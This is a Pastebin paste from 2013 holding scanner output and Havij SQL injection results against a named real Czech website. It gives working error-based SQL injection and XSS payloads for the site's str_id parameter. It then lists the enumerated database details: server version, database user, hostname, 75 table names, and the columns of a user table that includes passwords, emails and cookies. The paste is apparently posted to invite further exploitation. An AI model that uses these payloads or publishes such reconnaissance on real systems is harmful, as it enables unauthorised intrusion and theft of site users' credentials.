Advertisement
sroub3k

azd.cz

Mar 30th, 2013
380
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.43 KB | None | 0 0
  1. ||| SQL Injection
  2.  
  3. Severity: Critical
  4. Confirmation: Confirmed
  5. URL: http://www.azd.cz/?str_id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  6. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  7. Parameter Name: str_id
  8. Parameter Type: Querystring
  9. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  10.  
  11. ||| [High Possibility] SQL Injection
  12.  
  13. Severity: Critical
  14. Confirmation: Confirmed
  15. URL: http://www.azd.cz/?str_id=%27
  16. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  17. Parameter Name: str_id
  18. Parameter Type: Querystring
  19. Attack Pattern: %27
  20.  
  21. ||| XSS (Cross-site Scripting)
  22.  
  23. Severity : Important
  24. Confirmation : Confirmed
  25. URL: http://www.azd.cz/?str_id='"--></style></script><script>alert(0x001AFA)</script>
  26. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  27. Parameter Name: str_id
  28. Parameter Type: Querystring
  29. Attack Pattern: '"--></style></script><script>alert(0x001AFA)</script>
  30.  
  31. ||| Database Error Message
  32.  
  33. Severity: Low
  34. Confirmation: Confirmed
  35. URL: http://www.azd.cz/?str_id=%27
  36. Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
  37. Parameter Name: str_id
  38. Parameter Type: Querystring
  39. Attack Pattern: %27
  40.  
  41. ||| MySQL Database Identified
  42.  
  43. Severity : Information
  44. Confirmation : Confirmed
  45. URL: http://www.azd.cz/?str_id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  46. Parameter Name: str_id
  47. Parameter Type: Querystring
  48. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  49.  
  50. ||| E-mail Address Disclosure
  51.  
  52. Severity : Information
  53. Confirmation : Confirmed
  54. Found E-mails:
  55.  
  56. ||| Test - Havij
  57. - Small warning ! ( The program did not load data or items are not in any database data :D )
  58.  
  59. Target: http://www.azd.cz/?str_id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  60.  
  61. DB Server: MySQL
  62. Resp. Time(avg): 3243 ms
  63. Current User: azd_cz@localhost
  64. DBMS Version: 5.0.89
  65. Current DB: azd_cz_db
  66. System User: azd_cz@localhost
  67. Host Name: doyle.netservis.cz
  68. DB User: 'azd_cz'@'localhost'
  69. Data Bases: information_schema, azd_cz_db
  70.  
  71. Keyword defined by user: Duplicate
  72. Injection type is Integer
  73.  
  74. Current DB: azd_cz_db
  75. Count(table_name) of information_schema.tables where table_schema=0x617A645F637A5F6462 is 75
  76.  
  77. Table found: archAnkety
  78. Table found: pages
  79. Table found: pages_language_overlay
  80. Table found: refKML
  81. Table found: sysEmaily
  82. Table found: sysFoots
  83. Table found: sysPageMenu
  84. Table found: sysPhotos
  85. Table found: sysStyles
  86. Table found: sysUsers
  87. Table found: sys_refindex
  88. Table found: tabAkce
  89. Table found: tabAkce_meta
  90. Table found: tabAktuality
  91. Table found: tabAnkety
  92. Table found: tabAnketyMoznosti
  93. Table found: tabAntiBF
  94. Table found: tabCache
  95. Table found: tabCacheURL
  96. Table found: tabClanky
  97. Table found: tabConfig
  98. Table found: tabDPH
  99. Table found: tabDiskuse
  100. Table found: tabDiskusePrispevky
  101. Table found: tabEmaily
  102. Table found: tabFormulare
  103. Table found: tabFormulareEmaily
  104. Table found: tabFormulareOdeslane
  105. Table found: tabFormularePole
  106. Table found: tabFormulareStranky
  107. Table found: tabFotografie
  108. Table found: tabGM
  109. Table found: tabGMbod
  110. Table found: tabGMtypBodu
  111. Table found: tabHP
  112. Table found: tabKatalogy
  113. Table found: tabLanguages
  114. Table found: tabModuly
  115. Table found: tabNewsletter
  116. Table found: tabObrazky
  117. Table found: tabOperace
  118. Table found: tabOpravneni
  119. Table found: tabOpravneniDefinice
  120. Table found: tabPrihlaseni
  121. Table found: tabProdukty
  122. Table found: tabProduktySoubory
  123. Table found: tabReWriteID
  124. Table found: tabRegistrovani
  125. Table found: tabRssMirror
  126. Table found: tabStatistikaFulltext
  127. Table found: tabStranky
  128. Table found: tabStranky2
  129. Table found: tabVideoNastaveni
  130. Table found: tabVyrazy
  131. Table found: tabVyrazyPreklad
  132. Table found: tieAkceSouvisejici
  133. Table found: tieAkceSouvisejiciClanky
  134. Table found: tieClankySouvisejici
  135. Table found: tieNewsletterAkceEmaily
  136. Table found: tieNewsletterClanky
  137. Table found: tieOpravneniModuly
  138. Table found: tieOpravneniStranky
  139. Table found: tieOpravneniUzivatele
  140. Table found: tieProduktySouvisejici
  141. Table found: tieRoleUzivatele
  142. Table found: tieStrankyAkce
  143. Table found: tieStrankyAktuality
  144. Table found: tieStrankyClanky
  145. Table found: tieStrankyProdukty
  146. Table found: tt_content
  147. Table found: tt_news
  148. Table found: tx_dam
  149. Table found: tx_dam_cat
  150. Table found: tx_dam_mm_cat
  151. Table found: viewStrankyNadrazene
  152.  
  153. azd_cz_db.sysUsers
  154.  
  155. Count(column_name) of information_schema.columns where table_schema=0x617A645F637A5F6462 and table_name=0x7379735573657273 is 17
  156. Column found: ID
  157. Column found: User
  158. Column found: Password
  159. Column found: Name
  160. Column found: LName
  161. Column found: Phone
  162. Column found: Email
  163. Column found: Active
  164. Column found: NTAdmin
  165. Column found: Registrace
  166. Column found: Od
  167. Column found: Do
  168. Column found: Access
  169. Column found: LastIP
  170. Column found: LastCookie
  171. Column found: Login
  172. Column found: Poznamka
  173.  
  174. For more fortune to the database for you ..
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement